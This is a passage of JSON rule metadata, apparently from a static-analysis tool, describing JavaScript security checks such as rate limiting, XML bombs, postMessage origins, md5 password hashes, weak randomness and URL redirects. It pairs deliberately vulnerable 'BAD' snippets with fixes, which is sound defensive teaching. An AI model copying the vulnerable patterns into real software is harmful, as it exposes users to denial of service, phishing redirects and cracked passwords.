exhaustion.","id":"js/resource-exhaustion","kind":"path-problem","name":"Resource exhaustion","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/missing-rate-limiting","name":"js/missing-rate-limiting","shortDescription":{"text":"Missing rate limiting"},"fullDescription":{"text":"An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n  windowMs: 15 * 60 * 1000, // 15 minutes\n  max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n  windowMs: 15 * 60 * 1000, // 15 minutes\n  max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n  let path = req.params.path;\n  if (isValidPath(path))\n    res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-770","external/cwe/cwe-307","external/cwe/cwe-400"],"description":"An HTTP request handler that performs expensive operations without\n              restricting the rate at which operations can be carried out is vulnerable\n              to denial-of-service attacks.","id":"js/missing-rate-limiting","kind":"problem","name":"Missing rate limiting","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/xml-bomb","name":"js/xml-bomb","shortDescription":{"text":"XML internal entity expansion"},"fullDescription":{"text":"Parsing user input as an XML document with arbitrary internal entity expansion is vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n  expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = new expat.Parser();\n  parser.on(\"startElement\", handleStart);\n  parser.on(\"text\", handleText);\n  parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&amp;`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = sax.parser(true);\n  parser.onopentag = handleStart;\n  parser.ontext = handleText;\n  parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# XML internal entity expansion\nParsing untrusted XML files with a weakly configured XML parser may be vulnerable to denial-of-service (DoS) attacks exploiting uncontrolled internal entity expansion.\n\nIn XML, so-called *internal entities* are a mechanism for introducing an abbreviation for a piece of text or part of a document. When a parser that has been configured to expand entities encounters a reference to an internal entity, it replaces the entity by the data it represents. The replacement text may itself contain other entity references, which are expanded recursively. This means that entity expansion can increase document size dramatically.\n\nIf untrusted XML is parsed with entity expansion enabled, a malicious attacker could submit a document that contains very deeply nested entity definitions, causing the parser to take a very long time or use large amounts of memory. This is sometimes called an *XML bomb* attack.\n\n\n## Recommendation\nThe safest way to prevent XML bomb attacks is to disable entity expansion when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxmljs` (though not its SAX parser API), disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action is needed.\n\n\n## Example\nThe following example uses the XML parser provided by the `node-expat` package to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to a DoS attack, since `node-expat` expands internal entities by default:\n\n\n```javascript\nconst app = require(\"express\")(),\n  expat = require(\"node-expat\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = new expat.Parser();\n  parser.on(\"startElement\", handleStart);\n  parser.on(\"text\", handleText);\n  parser.write(xmlSrc);\n});\n\n```\nAt the time of writing, `node-expat` does not provide a way of controlling entity expansion, but the example could be rewritten to use the `sax` package instead, which only expands standard entities such as `&amp;`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  sax = require(\"sax\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    parser = sax.parser(true);\n  parser.onopentag = handleStart;\n  parser.ontext = handleText;\n  parser.write(xmlSrc);\n});\n\n```\n\n## References\n* Wikipedia: [Billion Laughs](https://en.wikipedia.org/wiki/Billion_laughs).\n* Bryan Sullivan: [Security Briefs - XML Denial of Service Attacks and Defenses](https://msdn.microsoft.com/en-us/magazine/ee335713.aspx).\n* Common Weakness Enumeration: [CWE-776](https://cwe.mitre.org/data/definitions/776.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-776","external/cwe/cwe-400"],"description":"Parsing user input as an XML document with arbitrary internal\n              entity expansion is vulnerable to denial-of-service attacks.","id":"js/xml-bomb","kind":"path-problem","name":"XML internal entity expansion","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/cross-window-information-leak","name":"js/cross-window-information-leak","shortDescription":{"text":"Cross-window communication with unrestricted target origin"},"fullDescription":{"text":"When sending sensitive information to another window using `postMessage`, the origin of the target window should be restricted to avoid unintentional information leaks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n","markdown":"# Cross-window communication with unrestricted target origin\nThe `window.postMessage` method allows different windows or iframes to communicate directly, even if they were loaded from different origins, circumventing the usual same-origin policy.\n\nThe sender of the message can restrict the origin of the receiver by specifying a target origin. If the receiver window does not come from this origin, the message is not sent.\n\nAlternatively, the sender can specify a target origin of `'*'`, which means that any origin is acceptable and the message is always sent.\n\nThis feature should not be used if the message being sent contains sensitive data such as user credentials: the target window may have been loaded from a malicious site, to which the data would then become available.\n\n\n## Recommendation\nIf possible, specify a target origin when using `window.postMessage`. Alternatively, encrypt the sensitive data before sending it to prevent an unauthorized receiver from accessing it.\n\n\n## Example\nThe following example code sends user credentials (in this case, their user name) to `window.parent` without checking its origin. If a malicious site loads the page containing this code into an iframe it would be able to gain access to the user name.\n\n\n```javascript\nwindow.parent.postMessage(userName, '*');\n\n```\nTo prevent this from happening, the origin of the target window should be restricted, as in this example:\n\n\n```javascript\nwindow.parent.postMessage(userName, 'https://github.com');\n\n```\n\n## References\n* Mozilla Developer Network: [Window.postMessage](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* Mozilla Developer Network: [Same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy).\n* Common Weakness Enumeration: [CWE-201](https://cwe.mitre.org/data/definitions/201.html).\n* Common Weakness Enumeration: [CWE-359](https://cwe.mitre.org/data/definitions/359.html).\n"},"properties":{"tags":["security","external/cwe/cwe-201","external/cwe/cwe-359"],"description":"When sending sensitive information to another window using `postMessage`,\n              the origin of the target window should be restricted to avoid unintentional\n              information leaks.","id":"js/cross-window-information-leak","kind":"path-problem","name":"Cross-window communication with unrestricted target origin","precision":"high","problem.severity":"error","security-severity":"4.3"}},{"id":"js/insufficient-key-size","name":"js/insufficient-key-size","shortDescription":{"text":"Use of a weak cryptographic key"},"fullDescription":{"text":"Using a weak cryptographic key can allow an attacker to compromise security."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n","markdown":"# Use of a weak cryptographic key\nModern encryption relies on it being computationally infeasible to break the cipher and decode a message without the key. As computational power increases, the ability to break ciphers grows and keys need to become larger.\n\n\n## Recommendation\nAn encryption key should be at least 2048-bit long when using RSA encryption, and 128-bit long when using symmetric encryption.\n\n\n## References\n* Wikipedia: [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)).\n* Wikipedia: [AES](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard).\n* NodeJS: [Crypto](https://nodejs.org/api/crypto.html).\n* NIST: [ Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* Wikipedia: [Key size](https://en.wikipedia.org/wiki/Key_size)\n* Common Weakness Enumeration: [CWE-326](https://cwe.mitre.org/data/definitions/326.html).\n"},"properties":{"tags":["security","external/cwe/cwe-326"],"description":"Using a weak cryptographic key can allow an attacker to compromise security.","id":"js/insufficient-key-size","kind":"problem","name":"Use of a weak cryptographic key","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/insufficient-password-hash","name":"js/insufficient-password-hash","shortDescription":{"text":"Use of password hash with insufficient computational effort"},"fullDescription":{"text":"Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n    var hasher = crypto.createHash('md5');\n    var hashed = hasher.update(password).digest(\"hex\"); // BAD\n    return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n  var hashed = bcrypt.hashSync(password, salt); // GOOD\n  return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n","markdown":"# Use of password hash with insufficient computational effort\nStoring cryptographic hashes of passwords is standard security practice, but it is equally important to select the right hashing scheme. If an attacker obtains the hashed passwords of an application, the password hashing scheme should still prevent the attacker from easily obtaining the original cleartext passwords.\n\nA good password hashing scheme requires a computation that cannot be done efficiently. Standard hashing schemes, such as `md5` or `sha1`, are efficiently computable, and are therefore not suitable for password hashing.\n\n\n## Recommendation\nUse a secure password hashing scheme such as `bcrypt`, `scrypt`, `PBKDF2`, or `Argon2`.\n\n\n## Example\nIn the example below, the `md5` algorithm computes the hash of a password.\n\n\n```javascript\nconst crypto = require(\"crypto\");\nfunction hashPassword(password) {\n    var hasher = crypto.createHash('md5');\n    var hashed = hasher.update(password).digest(\"hex\"); // BAD\n    return hashed;\n}\n\n```\nThis is not secure, since the password can be efficiently cracked by an attacker that obtains the hash. A more secure scheme is to hash the password with the `bcrypt` algorithm:\n\n\n```javascript\nconst bcrypt = require(\"bcrypt\");\nfunction hashPassword(password, salt) {\n  var hashed = bcrypt.hashSync(password, salt); // GOOD\n  return hashed;\n}\n\n```\n\n## References\n* OWASP: [Password storage](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-916](https://cwe.mitre.org/data/definitions/916.html).\n"},"properties":{"tags":["security","external/cwe/cwe-916"],"description":"Creating a hash of a password with low computational effort makes the hash vulnerable to password cracking attacks.","id":"js/insufficient-password-hash","kind":"path-problem","name":"Use of password hash with insufficient computational effort","precision":"high","problem.severity":"warning","security-severity":"8.1"}},{"id":"js/insecure-randomness","name":"js/insecure-randomness","shortDescription":{"text":"Insecure randomness"},"fullDescription":{"text":"Using a cryptographically weak pseudo-random number generator to generate a security-sensitive value may allow an attacker to predict what value will be generated."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `crypto.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n    // BAD: the random suffix is not cryptographically secure\n    var suffix = Math.random();\n    var password = \"myPassword\" + suffix;\n    return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n    // GOOD: the random suffix is cryptographically secure\n    var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n    var password = \"myPassword\" + suffix;\n    \n    // GOOD: if a random value between 0 and 1 is desired\n    var secret = window.crypto.getRandomValues(new Uint32Array(1))[0] * Math.pow(2,-32);\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [Crypto: getRandomValues()](https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n","markdown":"# Insecure randomness\nUsing a cryptographically weak pseudo-random number generator to generate a security-sensitive value, such as a password, makes it easier for an attacker to predict the value.\n\nPseudo-random number generators generate a sequence of numbers that only approximates the properties of random numbers. The sequence is not truly random because it is completely determined by a relatively small set of initial values, the seed. If the random number generator is cryptographically weak, then this sequence may be easily predictable through outside observations.\n\n\n## Recommendation\nUse a cryptographically secure pseudo-random number generator if the output is to be used in a security-sensitive context. As a rule of thumb, a value should be considered \"security-sensitive\" if predicting it would allow the attacker to perform an action that they would otherwise be unable to perform. For example, if an attacker could predict the random password generated for a new user, they would be able to log in as that new user.\n\nFor JavaScript on the NodeJS platform, `crypto.getRandomBytes` provides a cryptographically secure pseudo-random byte generator. Note that the conversion from bytes to numbers can introduce bias that breaks the security.\n\nFor JavaScript in the browser, `crypto.getRandomValues` provides a cryptographically secure pseudo-random number generator.\n\n\n## Example\nThe following examples show different ways of generating a password.\n\nIn the first case, we generate a fresh password by appending a random integer to the end of a static string. The random number generator used (`Math.random`) is not cryptographically secure, so it may be possible for an attacker to predict the generated password.\n\n\n```javascript\nfunction insecurePassword() {\n    // BAD: the random suffix is not cryptographically secure\n    var suffix = Math.random();\n    var password = \"myPassword\" + suffix;\n    return password;\n}\n\n```\nIn the second example, a cryptographically secure random number generator is used for the same purpose. In this case, it is much harder to predict the generated integers.\n\n\n```javascript\nfunction securePassword() {\n    // GOOD: the random suffix is cryptographically secure\n    var suffix = window.crypto.getRandomValues(new Uint32Array(1))[0];\n    var password = \"myPassword\" + suffix;\n    \n    // GOOD: if a random value between 0 and 1 is desired\n    var secret = window.crypto.getRandomValues(new Uint32Array(1))[0] * Math.pow(2,-32);\n}\n\n```\n\n## References\n* Wikipedia: [Pseudo-random number generator](http://en.wikipedia.org/wiki/Pseudorandom_number_generator).\n* Mozilla Developer Network: [Crypto: getRandomValues()](https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues).\n* NodeJS: [crypto.randomBytes](https://nodejs.org/api/crypto.html#crypto_crypto_randombytes_size_callback)\n* Common Weakness Enumeration: [CWE-338](https://cwe.mitre.org/data/definitions/338.html).\n"},"properties":{"tags":["security","external/cwe/cwe-338"],"description":"Using a cryptographically weak pseudo-random number generator to generate a\n              security-sensitive value may allow an attacker to predict what value will\n              be generated.","id":"js/insecure-randomness","kind":"path-problem","name":"Insecure randomness","precision":"high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/server-side-unvalidated-url-redirection","name":"js/server-side-unvalidated-url-redirection","shortDescription":{"text":"Server-side URL redirect"},"fullDescription":{"text":"Server-side URL redirection based on unvalidated user input may cause redirection to malicious web sites."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n  // BAD: a request parameter is incorporated without validation into a URL redirect\n  res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: the request parameter is validated against a known fixed string\n  let target = req.query[\"target\"];\n  if (VALID_REDIRECT === target) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n  try {\n    return (\n      // TODO: consider substituting your own domain for example.com\n      new URL(path, \"https://example.com\").origin === \"https://example.com\"\n    );\n  } catch (e) {\n    return false;\n  }\n}\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: check that we don't redirect to a different host\n  let target = req.query[\"target\"];\n  if (isLocalUrl(target)) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n","markdown":"# Server-side URL redirect\nDirectly incorporating user input into a URL redirect request without validating the input can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\nIf this is not possible, then the user input should be validated in some other way, for example, by verifying that the target URL is on the same host as the current page.\n\n\n## Example\nThe following example shows an HTTP request parameter being used directly in a URL redirect without validating the input, which facilitates phishing attacks:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"/redirect\", function (req, res) {\n  // BAD: a request parameter is incorporated without validation into a URL redirect\n  res.redirect(req.query[\"target\"]);\n});\n\n```\nOne way to remedy the problem is to validate the user input against a known fixed string before doing the redirection:\n\n\n```javascript\nconst app = require(\"express\")();\n\nconst VALID_REDIRECT = \"http://cwe.mitre.org/data/definitions/601.html\";\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: the request parameter is validated against a known fixed string\n  let target = req.query[\"target\"];\n  if (VALID_REDIRECT === target) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nAlternatively, we can check that the target URL does not redirect to a different host by parsing it relative to a base URL with a known host and verifying that the host stays the same:\n\n\n```javascript\nconst app = require(\"express\")();\n\nfunction isLocalUrl(path) {\n  try {\n    return (\n      // TODO: consider substituting your own domain for example.com\n      new URL(path, \"https://example.com\").origin === \"https://example.com\"\n    );\n  } catch (e) {\n    return false;\n  }\n}\n\napp.get(\"/redirect\", function (req, res) {\n  // GOOD: check that we don't redirect to a different host\n  let target = req.query[\"target\"];\n  if (isLocalUrl(target)) {\n    res.redirect(target);\n  } else {\n    res.redirect(\"/\");\n  }\n});\n\n```\nNote that as written, the above code will allow redirects to URLs on `example.com`, which is harmless but perhaps not intended. You can substitute your own domain (if known) for `example.com` to prevent this.\n\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n"},"properties":{"tags":["security","external/cwe/cwe-601"],"description":"Server-side URL redirection based on unvalidated user input\n              may cause redirection to malicious web sites.","id":"js/server-side-unvalidated-url-redirection","kind":"path-problem","name":"Server-side URL redirect","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/client-side-unvalidated-url-redirection","name":"js/client-side-unvalidated-url-redirection","shortDescription":{"text":"Client-side URL redirect"},"fullDescription":{"text":"Client-side URL redirection based on unvalidated user input may cause redirection to malicious web sites."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing attacks:\n\n\n```javascript\nwindow.location = /.*redirect=([^&]*).*/.exec(document.location.href)[1];\n\n```\n\n## References\n* OWASP: [ XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-601](https://cwe.mitre.org/data/definitions/601.html).\n","markdown":"# Client-side URL redirect\nRedirecting to a URL that is constructed from parts of the DOM that may be controlled by an attacker can facilitate phishing attacks. In these attacks, unsuspecting users can be redirected to a malicious site that looks very similar to the real site they intend to visit, but which is controlled by the attacker.\n\n\n## Recommendation\nTo guard against untrusted URL redirection, it is advisable to avoid putting user input directly into a redirect URL. Instead, maintain a list of authorized redirects on the server; then choose from that list based on the user input provided.\n\n\n## Example\nThe following example uses a regular expression to extract a query parameter from the document URL, and then uses it to construct a new URL to redirect to without any further validation. This may allow an attacker to craft a link that redirects from a trusted website to some arbitrary website of their choosing, which facilitates phishing 